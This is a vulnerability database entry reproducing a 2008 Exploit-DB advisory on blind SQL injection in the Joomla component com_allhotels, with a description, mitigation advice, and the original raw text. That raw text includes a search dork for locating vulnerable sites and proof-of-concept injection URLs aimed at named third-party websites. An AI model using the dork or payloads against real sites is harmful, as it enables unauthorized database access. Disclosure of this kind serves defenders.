Joomla Component com_allhotels (id) Blind SQL Injection Vulnerability

vendor:

com_allhotels

by:

Hussin X

7.5

CVSS

HIGH

SQL Injection

CWE

Product Name: com_allhotels

Affected Version From: N/A

Affected Version To: N/A

Patch Exists: NO

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2008

Joomla Component com_allhotels (id) Blind SQL Injection Vulnerability

A Blind SQL Injection vulnerability exists in the Joomla Component com_allhotels (id) which allows an attacker to inject malicious SQL queries into the application. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code in the 'id' parameter in the 'index.php' script. An attacker can exploit this vulnerability to gain access to the database and potentially gain access to sensitive information.

Mitigation:

Input validation should be used to prevent SQL injection attacks. The application should also be configured to use the least privileged user account with access to the database.

Source

Exploit-DB raw data:

Joomla Component com_allhotels (id)  Blind SQL Injection Vulnerability
___________________________________

Author: Hussin X

Home :  www.IQ-TY.com  & www.TrYaG.cc

___________________________________

script  : http://www.joomlahbs.com/  &  http://www.leveltensolutions.net/spa/

DorK : inurl:index.php?option=com_allhotels

Demo :
_______


http://www.leveltensolutions.net/spa/index.php?option=com_allhotels&task=showhoteldetails&id=1+and%20substring(@@version,1,1)=5

http://www.leveltensolutions.net/spa/index.php?option=com_allhotels&task=showhoteldetails&id=1+and%20substring(@@version,1,1)=4
____________________________( Greetz )_________________________________
|
|   All members of the Forum| WwW.IQ-ty.CoM |  WwW.TrYaG.CC |
|
|  My friends : DeViL iRaQ | IRAQ DiveR | IRAQ_JAGUR | CraCkEr | Sakab
|
|   Ghost Hacker | FAHD | Iraqihack | jiko | str0ke | Cyber-Zone | G4N0K|
|_____________________________________________________________________

 _____   ____   __   __     _       ____        ____    ____
|_   _| |  _ \  \ \ / /    / \     / ___|      / ___|  / ___|
  | |   | |_) |  \ V /    / _ \   | |  _      | |     | |
  | |   |  _ <    | |    / ___ \  | |_| |  _  | |___  | |___
  |_|   |_| \_\   |_|   /_/   \_\  \____| (_)  \____|  \____|

# milw0rm.com [2008-12-23]